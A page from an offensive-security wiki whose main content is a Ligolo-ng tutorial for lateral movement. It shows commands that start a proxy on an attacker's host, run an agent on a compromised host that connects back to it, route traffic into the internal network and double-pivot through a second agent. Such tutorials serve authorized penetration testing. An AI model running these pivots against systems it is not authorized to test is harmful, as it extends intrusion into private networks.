Infiltr8: The Red-Book
Infiltr8ForumGitHub
  • The Red-Book
  • Red-Teaming
    • Reconnaissance
      • DNS Enumeration
      • Subdomains enumeration
      • Email Harvesting
      • Host Discovery
      • TCP/UDP Service Scanning
      • Vulnerability Scanning
      • Google Dorks
      • GitHub Recon
      • Files Metadata
      • πŸ› οΈMaltego
      • πŸ› οΈSpecialized Search Engines
    • Execution
      • Code & Process Injection
        • Loading .NET Reflective Assembly
        • Loading .NET Assembly from Windows Script Hosting
        • Process Hollowing
        • WndProc Callback Shellcode Execution
        • Fibers Shellcode Execution
        • Vector Exception Handler Shellcode Execution
        • NtQueueApcThread & NtTestAlert Shellcode Execution
        • Thread Pool Callback Shellcode Execution
        • Module Stomping Shellcode Injection
        • Remote .NET Assembly Loading through WaaSRemediation DCOM Abuse
        • πŸ› οΈDLL Injection
        • πŸ› οΈCreateRemoteThread Injection
        • πŸ› οΈReflective DLL Injection
        • πŸ› οΈNtMapViewOfSection Injection
        • πŸ› οΈSetWindowHookEx Injection
        • πŸ› οΈPoolParty
        • πŸ› οΈMockingJay
      • Code Execution
        • CMSTP
        • MSBuild
        • MSHTA
        • Microsoft Office Execution
        • Windows Script Host (WSH)
        • Outlook Home Page Abuse (Specula)
        • Powershell Without Powershell.exe
        • RegSrv32
        • Scheduled Tasks
        • Services
        • Windows Library Files
        • HTML Help Files
        • WMI
        • Script Exploits
        • πŸ› οΈSliver
    • Initial Access
      • Network Services
      • Password Attacks
      • Phishing
        • HTML Smuggling
        • Phishing with Calendars (.ICS Files)
        • Phishing With Microsoft Office
          • MS Office - VBA (Macros)
          • MS Office - RTF Files RCE
          • MS Office - Custom XML parts
          • πŸ› οΈMS Office - Excel 4.0 (XLM) Macros
          • πŸ› οΈMS Office - VBA Stomping
          • πŸ› οΈMS Office - Remote Dotm Template Injection
        • πŸ› οΈPhishing via Proxy
          • Adversary in the Middle (AitM) Phishing
            • EvilGoPhish
            • Evilginx
            • Muraena
            • Modlishka
          • Browser in the Middle (BitM) Phishing
            • cuddlephish
            • EvilnoVNC
    • Persistence
      • Active Directory
      • Windows
        • Accessibility features Backdoor
        • AEDebug Keys Persistence
        • Image File Execution Options (IFEO) Persistence
        • Logon Triggered Persistence
        • LSA Persistence
          • Security Support Provider DLLs
          • Authentication Package
        • Natural Language 6 DLLs Persistence
        • Run Keys Persistence
        • Winlogon Persistence
        • WMI Event Subscription Persistence
      • Linux
        • SSH for Persistence
        • GSocket for Persistence
        • πŸ› οΈUdev rules
    • Defense Evasion
      • Endpoint Detection Respons (EDR) Bypass
        • Bring Your Own Vulnerable Driver (BYOVD)
        • Safe Mode With Networking
        • Windows Defender Application Control (WDAC): Killing EDR
        • πŸ› οΈLoad Unsigned Drivers
        • πŸ› οΈMinifilter Altitude
        • πŸ› οΈHypervisor Code Integrity (HVCI) Disallowed Images
        • πŸ› οΈWindows Filtering Platform (WFP)
        • πŸ› οΈUserland Hooking Bypass
      • UAC Bypass
      • AMSI Bypass
      • ETW evasion
      • Living Off The Land
        • Windows Sysinternals
        • LOLBAS Project
        • File Operations
        • File Executions
      • Signature Evasion
      • Obfuscation
        • PowerShell Obfuscation
        • πŸ› οΈCommandline Obfusaction
        • πŸ› οΈPE Obfuscation
        • πŸ› οΈString Encryption
      • AppLocker Bypass
      • Mark-of-the-Web (MotW) Bypass
      • πŸ› οΈPowerShell Constrained Language Mode (CLM) Bypass
      • πŸ› οΈKill Windows Defender
      • πŸ› οΈVirtualization-based security (VBS) Bypass
        • πŸ› οΈCredential Guard bypass
        • πŸ› οΈhypervisor-protected code integrity (HVCI) Bypass
        • πŸ› οΈWindows Defender Application Control (WDAC) Bypass
      • πŸ› οΈSandbox Evasion
    • Discovery
      • Active Directory
      • Windows
        • System Information
        • Processes & Services
        • Scheduled Tasks
        • Installed applications
        • Network Configuration
        • FIle/Folder ACLs
        • Knowing your Shell
        • Security Solutions
      • Linux
        • OS Details
        • πŸ› οΈProcess & Services
    • Privilege Escalation
      • Windows
        • Tools βš™οΈ
        • PowerShell Logging
        • Credentials In Files
        • Abusing Tokens
        • Insecure Services
          • Weak Service Permissions
          • Weak File/Folder Permissions
          • Weak Registry Permissions
          • Unquoted Service Path
        • AlwaysInstallElevated
        • AutoLogon Registry
        • Insecure Scheduled Tasks
          • Weak File/Folder Permissions
        • πŸ› οΈDLL Hijacking
      • Linux
        • Kernel Exploits
          • OverlayFs Exploits
            • GameOverlayFs
            • CVE-2023-0386
            • CVE-2021-3493
          • CVE-2023-32233 (CAP_NET_ADMIN)
          • Dirty Pipe
          • πŸ› οΈDirtyCow
          • πŸ› οΈRDS
          • πŸ› οΈFull Nelson
          • πŸ› οΈMempodipper
        • GLIBC Exploits
          • Looney Tunables
        • Polkit Exploits
          • PwnKit
          • D-Bus Authentication Bypass
        • Sudo Exploits
          • Sudo Binaries
          • Sudo Misconfigurations
          • Reuse Sudo Tokens
          • User Restriction Bypass
          • Pwfeedback BOF
          • Baron Samedit
          • Sudoedit Bypass
        • SUID Binaries
        • Script Exploits
          • Python
            • Pip Download Code Execution
            • PyInstaller Code Execution
            • Pytorch Models/PTH Files Code Execution
          • Ruby
          • Bash
          • Perl
        • Scheduled tasks
          • Cron Jobs
          • Systemd timers
        • Interesting Groups
          • Lxd
        • Capabilities
        • NFS no_root_squash/no_all_squash
        • Linux Active Directory
    • Credential Access
      • Password Stores
        • Windows Credential Manager
        • KeePass
        • Web Browsers
      • Unsecured Credentials
        • Credentials In Files
        • VNC Config
        • SSH Private Keys
        • Git Repositories
        • Veeam Backup
        • Network shares
        • Network protocols
      • OS Credentials
        • Windows & Active Directory
          • SAM & LSA secrets
          • DPAPI secrets
          • NTDS secrets
          • LSASS secrets
          • DCSync
          • Kerberos key list
          • Group Policy Preferences
          • AutoLogon Registry
          • In-memory secrets
          • Cached Kerberos tickets
        • Linux
          • Shadow File
          • In-memory secrets
          • Linux Cached Kerberos tickets
      • MITM and coerced auths
      • Password Attacks
        • Default, weak & Leaked Passwords
        • Generate Wordlists
        • Brute-Force
          • Online - Attacking Services
          • Offline - Password Cracking
      • Impersonation
    • Lateral Movement
      • Port Forwarding
      • TLS Tunneling (Ligolo-ng)
      • HTTP(s) Tunneling
      • SSH Tunneling
      • DNS Tunneling
      • SMB-based
      • WinRM
      • Remote WMI
      • DCOM
      • Scheduled Tasks (ATSVC)
      • Services (SVCCTL)
    • Exfiltration
      • Exfiltration over ICMP
      • Exfiltration Over DNS
      • Exfiltration Over HTTP(s)
      • Exfiltration Over SMB
  • Web Pentesting
    • Reconnaissance
      • Subdomains enumeration
      • WAF Enumeration
    • Infrastructures
      • DBMS
        • Enum Databases
        • Read/Write/Execute
      • DNS
        • Subdomain Takeover
      • Web Servers
        • Nginx
        • Apache
          • Apache Commons Text
          • Apache Tomcat
      • CMS
        • Wordpress
        • πŸ› οΈJoomla
        • πŸ› οΈDrupal
        • πŸ› οΈBolt CMS
      • Frameworks
        • Spring Framework
          • Spring Routing Abuse
          • Spring Boot Actuators
          • Spring View Manipulation
        • Werkzeug
        • πŸ› οΈDjango
        • πŸ› οΈFlask
        • πŸ› οΈLaravel
      • CGI
    • Web Vulnerabilities
      • Server-Side
        • NoSQL Injection
        • SQL Injection
          • UNION Attacks
          • Blind Attacks
            • Boolean Based
            • Time Based
            • Error Based
        • Insecure Deserialization
          • .NET Deserialization
          • Python Deserialization
          • PHP Deserialization
          • πŸ› οΈJava Deserialization
          • πŸ› οΈRuby Deserialization
        • File Inclusion & Path Traversal
          • LFI to RCE
            • PHP Wrappers
            • Logs Poisoning
            • /proc
            • PHPInfo
            • PHP Sessions
            • Segmentation Fault
          • RFI to RCE
        • Command Injection
        • Brute-Force
        • SSTI (Server-Side Template Injection)
        • Exposed Git Repositories
        • πŸ› οΈFile Upload
      • Client-Side
        • XSS (Cross-Site Scripting)
        • CORS (Cross-origin resource sharing)
  • Network Pentesting
    • Network services
      • DNS
      • FastCGI
      • HTTP & HTTPS
      • LDAP
      • NFS
      • MS-RPC
      • MSSQL
      • NBT-NS (NetBIOS)
      • Oracle TNS
      • RDP
      • Rsync
      • SMB
      • SMTP
      • SNMP
      • SSH
      • WebDAV
      • WinRM
      • XMPP/Jabber
      • πŸ› οΈRPC Port Mapper
      • πŸ› οΈFTP
      • πŸ› οΈTelnet
      • πŸ› οΈMySQL
    • WiFi
      • πŸ› οΈWEP
      • πŸ› οΈWPA2
      • πŸ› οΈWPS
    • Bluetooth
  • Active Directory Pentesting
    • Reconnaissance
      • Tools βš™οΈ
        • PowerView βš™οΈ
        • Responder βš™οΈ
        • BloodHound βš™οΈ
        • enum4linux βš™οΈ
      • Network
        • DHCP
        • DNS
        • NBT-NS
        • Port scanning
        • SMB
        • LDAP
        • MS-RPC
      • Objects & Settings
        • DACLs
        • Group policies
        • Password policy
        • LAPS
    • Movement
      • Credentials
        • Dumping
        • Cracking
        • Bruteforcing
          • Guessing
          • Spraying
          • Stuffing
        • Shuffling
      • MITM and coerced auths
        • ARP poisoning
        • DNS spoofing
        • DHCP poisoning
        • DHCPv6 spoofing
        • WSUS spoofing
        • LLMNR, NBT-NS, mDNS spoofing
        • ADIDNS poisoning
        • WPAD spoofing
        • MS-EFSR abuse (PetitPotam)
        • MS-RPRN abuse (PrinterBug)
        • MS-FSRVP abuse (ShadowCoerce)
        • MS-DFSNM abuse (DFSCoerce)
        • MS-EVEN abuse (CheeseOunce)
        • PushSubscription abuse
        • WebClient abuse (WebDAV)
        • Living off the land
        • πŸ› οΈNBT Name Overwrite
        • πŸ› οΈICMP Redirect
      • NTLM
        • Capture
        • Relay
        • Pass the hash
      • Kerberos
        • Pre-auth bruteforce
        • Pass the key
        • Overpass the hash
        • Pass the ticket
        • Pass the cache
        • Forged tickets
          • Silver tickets
          • Golden tickets
          • Diamond tickets
          • Sapphire tickets
          • RODC Golden tickets
          • MS14-068
        • ASREQroast
        • ASREProast
        • Kerberoast
        • Delegations
          • (KUD) Unconstrained
          • (KCD) Constrained
          • (RBCD) Resource-based constrained
          • S4U2self abuse
          • Bronze Bit
        • Shadow Credentials
        • UnPAC the hash
        • Pass the Certificate - PKINIT
        • sAMAccountName spoofing
        • SPN-jacking
      • Netlogon
        • ZeroLogon
      • DACL abuse
        • AddMember
        • ForceChangePassword
        • Targeted Kerberoasting
        • WriteOwner
        • ReadLAPSPassword
        • ReadGMSAPassword
        • Grant ownership
        • Grant rights
        • Logon script
        • Rights on RODC object
      • Group policies
      • Trusts
      • Certificate Services (AD-CS)
        • Certificate templates
        • Certificate authority
        • Access controls
        • Unsigned endpoints
        • Certifried
      • Schannel
        • Pass the Certificate - Schannel
      • SCCM / MECM
        • Privilege Escalation
        • Post Exploitation
      • Exchange services
        • PrivExchange
        • ProxyLogon
        • ProxyShell
        • ProxyNotShell
      • Print Spooler Service
        • PrinterBug
        • PrintNightmare
      • Built-ins & settings
        • Builtin Groups
          • DNSAdmins
          • AD Recycle Bin
        • MachineAccountQuota
        • Pre-Windows 2000 computers
        • RODC
    • Persistence
      • Skeleton key
      • SID History
      • AdminSDHolder
      • GoldenGMSA
      • Kerberos
        • Forged tickets
        • Delegation to KRBTGT
      • Certificate Services (AD-CS)
        • Certificate authority
        • Access controls
        • Golden certificate
      • LAPS
      • πŸ› οΈDC Shadow
      • πŸ› οΈAccess controls
  • πŸ› οΈCloud & CI/CD Pentesting
    • CI/CD
      • Ansible Pentesting
      • Artifactory Pentesting
      • Docker Registry
        • πŸ› οΈHTTP API V2
      • πŸ› οΈKubernetes
      • πŸ› οΈGitLab
      • πŸ› οΈGithub
      • πŸ› οΈGitea
      • πŸ› οΈJenkins
      • πŸ› οΈTerraform
    • Azure Pentesting
      • Reconnaissance
        • Tools βš™οΈ
        • Unauthenticated Reconnaissance
        • Internal Reconnaissance
      • Movement
        • Credentials
          • Password Spraying
          • Token Manipulation
            • Pass-The-Cookie (PTC)
            • Pass the Certificate (Azure)
            • Pass the PRT
        • Aazure Resources
          • Key Vault
          • Storage Accounts
          • Virtual Machines
          • Automation
          • Databases
        • Role-Based Access
        • Conditional Access
        • Service Principals & Applications
        • Hybrid Identity
          • Password Hash Sync (PHS)
          • Pass-through Authentication (PTA)
          • Active Directory Federation Services (ADFS)
          • Seamless SSO
          • Cloud Kerberos Trust
        • Cross-Tenant Access
      • Persistence
    • GCP Pentesting
    • AWS Pentesting
  • πŸ› οΈSmart Contracts Pentesting
    • Solidity
      • Vulnerabilities
        • Delegatecall Attack
        • Denial of Service Attack
        • Overflow & Underflow
        • Reentrancy Attack
        • Self Destruct Attack
        • Tx Origin Attack
Powered by GitBook
On this page
  • Theory
  • Practice
  • Resources

Was this helpful?

Edit on GitHub
  1. Red-Teaming
  2. Lateral Movement

TLS Tunneling (Ligolo-ng)

MITRE ATT&CKβ„’ Protocol Tunneling - Technique T1572

Last updated 4 days ago

Was this helpful?

Theory

(Golang) is a network pivoting tool that allows us to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).

It utilizes a local proxy server and remote agents to make process tunneling from remote hosts simple and easy to manage. It has features other tools lack, such as building a network interface in the system userland that does not require elevated privileges to establish and encrypt VPN tunneling.

Using ligolo-ng, we can perform SYN scan or send ICMP packets trought the created interface. (in contrast with SOCKS pivoting techniques like with or ).

Practice

Before using it, you should first .

First, start the proxy server on the Attacking Host or Jump Box:

# Use in self-signed mode
# if -laddr is not specified, default is 0.0.0.0:11601 
./proxy -selfcert -laddr 0.0.0.0:<LISTENING_SVR_PORT>

# Use a custom certificate
./proxy -certfile <cert.pem> -keyfile <key.pem>

On the compromised host, after uploading the agent, we use the following command:

# Connect if server is in self-signed mode
./agent -connect <LIGOLO_SVR_IP>:<LISTENING_SVR_PORT> -ignore-cert

# Connect
./agent -connect <LIGOLO_SERVER_IP>:<SRV_LISTENING_PORT>

When the agent connect back to the server, we must enumerate its network as follow:

# Choose the agent
ligolo-ng Β» session

# Enumerate network
[Agent : pwned@target] Β» ifconfig
[...]
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Interface 2                                   β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Name         β”‚ ens224                         β”‚
β”‚ Hardware MAC β”‚ 00:50:56:86:dd:bd              β”‚
β”‚ MTU          β”‚ 1500                           β”‚
β”‚ Flags        β”‚ up|broadcast|multicast|running β”‚
β”‚ IPv4 Address β”‚ 10.10.10.63/24                 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Take note of interesting agent interfaces that may be use for pivoting, and add the route on the proxy/relay server. In this example we'll do as follow

# Linux
# With ligolo the interface name, replace if different
$ sudo ip route add 10.10.10.0/24 dev ligolo

# Windows
> netsh int ipv4 show interfaces

Idx     MΓ©t         MTU          Γ‰tat                Nom
---  ----------  ----------  ------------  ---------------------------
 25           5       65535  connected     ligolo
   
> route add 10.10.10.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Finally, start the tunnel on the ligolo proxy server:

[Agent : pwned@target] Β» start

# OR

[Agent : pwned@target] Β» tunnel_start --tun ligolo

Done ! We can now access the 10.10.10.0/24 agent network from the proxy server.

All Versions

# Linux
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

# Windows
# You need to download the Wintun driver and place the "wintun.dll" in the same folder as Ligolo (make sure you use the right architecture).
# https://www.wintun.net/

Versions β‰₯ 0.46

Alternatively, on Ligolo-ng >= v0.6, you can now use the interface_create command to create a new interface! No need to use ip tuntap!

ligolo-ng Β» interface_create --name "ligolo"

To perform double pivoting with ligolo-ng, we can add a listener on any agent. For example, if Agent2 only has access to Agent1 and we want to proxy its traffic.

We must add a listener on Agent1 from Ligolo Server:

# Where 11601 is the Ligolo LISTENING_SVR_PORT
# And 172.16.5.15:4455 the Agent1 listening IP and Port
[Agent : pwned@Agent1] Β» listener_add –addr 172.16.5.15:4455 –to 127.0.0.1:11601

Then, we can join Agent2 as follow

# Where 172.16.5.15:4455 is the Agent1 listening IP and Port
.\agent.exe -connect 172.16.5.15:4455 [-ignore-cert]

Resources

fisrt need to be configured. We need to create a tun interface on the Proxy Server (Attacking Host, or Jumb Box):

Ligolo-ng
Ligolo-ng
Setup Ligolo-ng
GitHub - nicocha30/ligolo-ng at v0.4.4GitHub
Chisel
SSH
Logo